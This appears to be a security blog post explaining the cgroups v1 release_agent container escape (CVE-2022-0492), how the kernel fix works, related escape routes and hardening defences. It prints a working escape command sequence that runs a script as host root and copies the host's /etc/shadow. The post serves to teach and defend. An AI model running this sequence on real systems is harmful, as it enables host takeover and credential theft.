How a Container Escape Works: The cgroups v1 release_agent Technique

How a Container Escape Works: The cgroups v1 release_agent Technique

Written by

in

A container escape happens when a process running inside a container breaks out of its restricted view of the system and starts acting on the host directly, usually as root. The reason this is even possible comes down to one fact people forget: a container is not a virtual machine. It is an ordinary Linux process that the kernel has wrapped in restricted namespaces and cgroups, and that process shares the exact same kernel as the host and every other container on the box. There is no hypervisor in between. This post walks one specific, real escape end to end, the cgroups v1 release_agent technique tracked as CVE-2022-0492, and then steps back to the wider family of escapes that all rely on the same shared kernel boundary.

Why a container escape is possible at all

Start with what a container actually is, because the whole escape hinges on it. When you run docker run or start a pod, you do not boot a second machine. The kernel takes a normal process and changes what it can see. Namespaces give it a private view of process IDs, mount points, network interfaces, and user IDs, so from inside it looks like the process owns the system. Cgroups (control groups) cap how much CPU, memory, and IO it can use. Capabilities and seccomp filters trim which privileged operations and syscalls it is allowed to make. Stack those together and you get isolation that feels like a separate machine.

But every one of those layers is enforced by the same kernel the host runs. A virtual machine gets a virtual CPU and virtual hardware from a hypervisor, and the guest kernel is genuinely separate; to escape a VM you have to defeat the hypervisor itself. A container has none of that. The isolation is just bookkeeping inside one shared kernel. So if you can reach a kernel interface that was never namespaced, or you hold a capability that the kernel trusts more than it should, or the kernel has a bug you can hit from inside, the boundary is not a wall. It is a convention, and conventions can be talked out of.

That is the mental model for the rest of this post. The container assumes the kernel will keep enforcing its restricted view. CVE-2022-0492 is what happens when one kernel interface forgets to check who is allowed to touch it.

It is worth being precise about capabilities here, because the whole vulnerability turns on a subtlety in how they work. A capability is a slice of root’s power that the kernel can hand out one piece at a time instead of granting everything at once. CAP_NET_BIND_SERVICE lets a process bind a low port. CAP_SYS_ADMIN is the grab bag that covers mounting filesystems, setting hostnames, and a long list of other administrative actions, which is why it is often described as the new root. A default container runtime hands a container a deliberately small set and drops the dangerous ones. The kernel then checks, at the moment of each privileged action, whether the calling process holds the capability that action requires. The escape we are about to walk is, at bottom, a story about the kernel checking that the caller holds CAP_SYS_ADMIN but checking it in the wrong place.

The cgroup v1 release_agent mechanism

To understand the escape you first have to understand a perfectly legitimate cgroups feature that was never meant to be reachable from inside a container.

What release_agent and notify_on_release do

In cgroups version 1, every control group can carry two special files. The first is notify_on_release, a flag set to 0 or 1. The second is release_agent, which lives at the root of a cgroup hierarchy and holds a path to a program. The deal is simple. When notify_on_release is set to 1 on a cgroup and the last process in that cgroup exits, leaving it empty, the kernel runs the program named in release_agent to clean up. This is a real housekeeping mechanism documented in the kernel cgroups manual page. It exists so userspace can react when a group empties out.

The critical detail is who runs that program and where. The kernel invokes the release_agent binary itself, from the host context, as a fully privileged root process with all capabilities, in the host’s namespaces. It is not run inside the container. It is run by the kernel on the host. So if an attacker inside a container can write a path of their choosing into a release_agent file and then cause a cgroup to empty, the kernel will execute their chosen program as root on the host. That is the entire escape in one sentence. Everything else is about getting permission to write that file.

The capability that was supposed to guard it

Writing to release_agent is obviously dangerous, so the kernel gates it behind a capability. The relevant capability is CAP_SYS_ADMIN, the broad administrative capability that container runtimes strip from containers by default precisely because it is so powerful. A normal Docker or Kubernetes container does not hold CAP_SYS_ADMIN, so under default settings it cannot write release_agent, and the housekeeping feature stays a housekeeping feature.

For years that was the assumed boundary. If you wanted to abuse release_agent, you needed CAP_SYS_ADMIN, and if you had CAP_SYS_ADMIN you were already a heavily privileged container that could do plenty of damage anyway. The interesting question, and the one CVE-2022-0492 answers, is whether a container could obtain a working CAP_SYS_ADMIN over a cgroup mount without the host ever granting it.

The classic escape with a privileged container

It helps to see the abuse in its original, non vulnerability form first, because the vulnerability simply removes the precondition. Picture our invented note taking service, Acme Notes, which runs each customer’s background jobs in a container. Suppose an attacker has found a way to run as root inside one of those job containers, and the container was started privileged so it does hold CAP_SYS_ADMIN. The escape is a short sequence:

mkdir /tmp/cgrp && mount -t cgroup -o rdma cgroup /tmp/cgrp
mkdir /tmp/cgrp/x
echo 1 > /tmp/cgrp/x/notify_on_release
host_path=$(sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab)
echo "$host_path/cmd" > /tmp/cgrp/release_agent
echo '#!/bin/sh' > /cmd
echo "cat /etc/shadow > $host_path/output" >> /cmd
chmod a+x /cmd
sh -c "echo 0 > /tmp/cgrp/x/cgroup.procs"

Read it top to bottom. You mount a cgroup v1 controller (the rdma controller is a common pick) so its hierarchy is writable. You make a child cgroup x and turn on notify_on_release for it. You find the container’s path on the host filesystem by reading the overlay mount info, then write host_path/cmd into release_agent, so the kernel will look for the agent at a path that resolves to a file inside your container. You drop a small script at /cmd that does whatever you want, here dumping the host’s /etc/shadow back to a place you can read. Finally you write a PID into the child’s cgroup.procs and let it exit, emptying the cgroup. The kernel sees the empty group, reads release_agent, and runs /cmd as root on the host. You just executed code outside the container.

The kernel was never tricked into running the wrong file. It ran exactly the file it was told to, as root, on the host, because nothing checked that the process which named that file had any business naming it.

CVE-2022-0492: the missing check

The classic technique above needs a privileged container with CAP_SYS_ADMIN. CVE-2022-0492 is the discovery that an unprivileged container could reach the same write through a back door, because the kernel’s permission check on release_agent was wrong.

What Unit 42 found

The vulnerability was disclosed in early 2022 by Yiqi Sun and Kevin Wang, with the most detailed public writeup published by Palo Alto Networks’ Unit 42 research team. The flaw lived in the cgroup_release_agent_write function in kernel/cgroup/cgroup-v1.c. That function is what runs when something writes to a release_agent file, and it was supposed to confirm the writer was sufficiently privileged before accepting the new path. It did not. The function failed to verify that the writing process held CAP_SYS_ADMIN in the initial user namespace. The official CVE record for CVE-2022-0492 describes it as allowing the cgroups v1 release_agent feature to escalate privileges and bypass namespace isolation, and NVD scores it CVSS v3.1 7.8, high severity.

What makes the finding sharp is that the underlying release_agent abuse was already public and understood as a privileged container trick. The contribution was noticing that user namespaces had quietly changed the threat model: a feature whose guard assumed only a genuinely privileged process could ever reach it was now reachable by any process that could spin up its own user namespace and call its bluff. The bug had reportedly been present since the relevant code path was introduced years earlier, sitting in plain sight, dangerous only once unprivileged user namespaces became common enough to weaponize. That is the recurring texture of this class of flaw. Nothing crashed, nothing leaked, the code did exactly what it said. It just trusted the wrong namespace.

Why an unprivileged user namespace is the key

This is the part that turns a missing check into a real escape. Linux user namespaces let an unprivileged process create a new user namespace in which it is root and holds a full set of capabilities, including CAP_SYS_ADMIN, but only over resources owned by that new namespace. The whole point of user namespaces is that this capability is local and fake from the host’s point of view. You are root in your little bubble; the host still sees you as nobody. Inside that new user namespace you are allowed to create a new mount namespace and mount a fresh cgroup v1 hierarchy, and within that hierarchy you have a writable release_agent file.

Now the two pieces meet. The attacker holds CAP_SYS_ADMIN, but only in the new user namespace, which should not count for a host level action like setting a release agent. The kernel’s job in cgroup_release_agent_write was to notice that and refuse. Because the check was missing, the kernel accepted the write from a process whose CAP_SYS_ADMIN was the local, namespaced, supposed to be harmless kind. The attacker then runs the same notify_on_release sequence, empties the cgroup, and the kernel dutifully executes their script as real root on the host. An unprivileged container, given that user namespaces are enabled and no extra hardening blocks the steps, escapes to the host.

The distinction the kernel missed is the difference between two functions with very similar names. ns_capable asks whether the caller holds a capability in some particular user namespace, which a process that just created its own user namespace always satisfies, because it minted itself a full capability set when it created the namespace. capable asks whether the caller holds the capability in the host’s original user namespace, the one no unprivileged process can fake its way into. The release agent write must demand the second kind, because the program it stores gets run as host root. The vulnerable code effectively settled for the first kind, or for no kind at all, which is why a process that was root only inside its own bubble could set a file that the kernel would then honor with the real thing. The gap between those two questions is the entire CVE.

One more nuance makes the escape practical rather than theoretical. The attacker has to name a program the kernel can actually find and run from the host context. Because the kernel resolves the release_agent path on the host, the attacker reads the container’s location on the host filesystem out of the mount information, usually the overlay upperdir, and writes a path that lands inside files they already control from within the container. So the script the kernel executes as root is a file the attacker wrote inside the container, reached by its true host path. No file is smuggled across the boundary; the same bytes are simply addressed two ways.

This is fundamentally a privilege escalation dressed as a container escape. The container gains an authority it was never assigned by exploiting an interface that trusted a capability it should have distrusted.

The kernel fix

The fix is almost anticlimactically small, which is what makes it instructive. The patch landed in mainline as commit 24f6008564183aa120d07c03d9289519c2fe02af and added the check that should always have been there. Before accepting a write to release_agent, the function now confirms the caller is operating in the initial user namespace and holds genuine CAP_SYS_ADMIN, using capable(CAP_SYS_ADMIN) against the host’s init_user_ns rather than the namespace local ns_capable check that a user namespace could satisfy. If the writer’s user namespace is not init_user_ns, or it lacks real CAP_SYS_ADMIN, the write is rejected with EPERM. That single distinction, host capability versus namespaced capability, is the whole bug and the whole fix. The fix shipped in 5.17 and was backported to the maintained stable trees.

The broader family of container escapes

The release_agent trick is one entry in a catalog, and it is worth knowing the neighbors, because they all share the shared kernel premise even when the specific door differs.

Privileged containers

A container started with --privileged is barely a container at all. It keeps almost all capabilities, including CAP_SYS_ADMIN, and it can see host devices. The classic release_agent escape works directly from such a container with no vulnerability required, and so do many other tricks, because a privileged container is one short step from being a host root shell. The lesson is that privileged is a decision to drop the boundary, not a convenience flag.

A mounted docker.sock

Mounting the Docker daemon socket, /var/run/docker.sock, into a container hands that container the ability to talk to the Docker daemon, which runs as root on the host. From inside, the process can ask the daemon to start a new container that mounts the host’s root filesystem and runs as root, then read or write anything on the host. There is no kernel bug here at all. The container was simply given a control channel to a privileged host service.

Exposed host mounts

Bind mounting sensitive host paths into a container, the host root, /etc, the Docker directory, or device nodes, gives the container direct reach into host state. Write access to the right host file, such as a script the host runs on a schedule or a configuration the host trusts, is escape enough. The boundary leaks wherever a writable path crosses it.

A vulnerable shared kernel

Because the kernel is shared, any kernel memory corruption bug reachable from inside a container is a candidate escape. Dirty COW (CVE-2016-5195) and Dirty Pipe (CVE-2022-0847) are the famous examples: both let an unprivileged process overwrite files it should only be able to read by abusing a flaw in how the kernel handles copy on write or pipe page memory, and both can be fired from inside a container to overwrite a host owned file and gain root. A different flavor of the same family is a kernel use after free, where freed kernel memory is reclaimed and reused to corrupt state the attacker controls. The common thread is unmistakable: one kernel, shared by host and container, so a kernel bug is a host bug.

Defending against the release_agent escape

The good news is that the same hardening that blocks most of this family blocks the release_agent path too. Patch the kernel so cgroup_release_agent_write enforces the real capability check. Keep the default seccomp and the default AppArmor or SELinux profiles in place, because they deny the mount and write steps the exploit needs; Unit 42 noted the escape only works against containers running without those protections. Drop CAP_SYS_ADMIN and run unprivileged. Where you do not need them, disabling unprivileged user namespaces removes the mechanism that hands an unprivileged container its local CAP_SYS_ADMIN in the first place. And prefer cgroups v2, which does not carry the release_agent and notify_on_release interface in the form this exploit abuses. None of these is exotic. They are the defaults, and the escape mostly works where the defaults were removed.

The assumption that breaks

Underneath all of it sits one assumption, and it is the same assumption every time. A container assumes the kernel boundary holds. It behaves as though its namespaces and cgroups are a wall around it, as solid as the virtual hardware around a VM. But the kernel is not a wall around the container. It is the floor under both the container and the host, one shared surface, and the container is standing on it right next to everything it is supposed to be isolated from. The moment a single capability is trusted too far, or a single kernel interface forgets to ask who is calling, or a single host path is left writable across the line, the boundary was never there. It was a set of checks, and one missing check, the absent CAP_SYS_ADMIN test in cgroup_release_agent_write, was enough to collapse the whole thing into a root shell on the host.

That is the shape of bug you only find by asking what each layer trusts and why it still trusts it, rather than by scanning for a known bad pattern. The vulnerability was not a crash or a corrupted pointer. It was an interface that assumed a capability meant what it used to mean before user namespaces made capabilities local and cheap. Finding it meant questioning a boundary everyone treated as settled. That is exactly the kind of assumption an autonomous researcher built to test assumptions is meant to catch: not the malformed input, but the quiet premise that the wall is a wall. Read more about that approach on our about page.

Frequently asked questions

What is a container escape?

A container escape is when a process inside a container breaks out of its restricted namespaces and cgroups and acts on the host directly, usually as root. It is possible because a container is not a virtual machine; it is an ordinary process that shares the same kernel as the host, so one over trusted capability or one writable host interface can collapse the boundary. The Unit 42 analysis of CVE-2022-0492 walks a real example end to end.

How does the cgroups v1 release_agent escape work?

In cgroups v1 a hierarchy can hold a release_agent file naming a program the kernel runs as root on the host when a cgroup with notify_on_release set to 1 becomes empty. If an attacker can write a path into release_agent and then empty a cgroup, the kernel executes their chosen script as root outside the container. The man7 cgroups documentation describes the legitimate release agent and notify_on_release mechanism this abuses.

What did CVE-2022-0492 actually break?

The cgroup_release_agent_write function in kernel/cgroup/cgroup-v1.c failed to verify that the process writing release_agent held real CAP_SYS_ADMIN in the initial user namespace. An unprivileged container could create a user namespace where it holds a local, supposed to be harmless CAP_SYS_ADMIN, mount a writable cgroupfs, and write the file the kernel trusted. The flaw is documented at CVE-2022-0492 and scored CVSS 7.8 high by NVD.

How do you defend against this container escape?

Patch the kernel so cgroup_release_agent_write enforces the real capability check (the fix landed in commit 24f6008564183aa120d07c03d9289519c2fe02af), keep the default seccomp and AppArmor or SELinux profiles, drop CAP_SYS_ADMIN, avoid privileged containers and mounted docker.sock, and disable unprivileged user namespaces where you do not need them. The Sysdig writeup on CVE-2022-0492 covers detection and mitigation.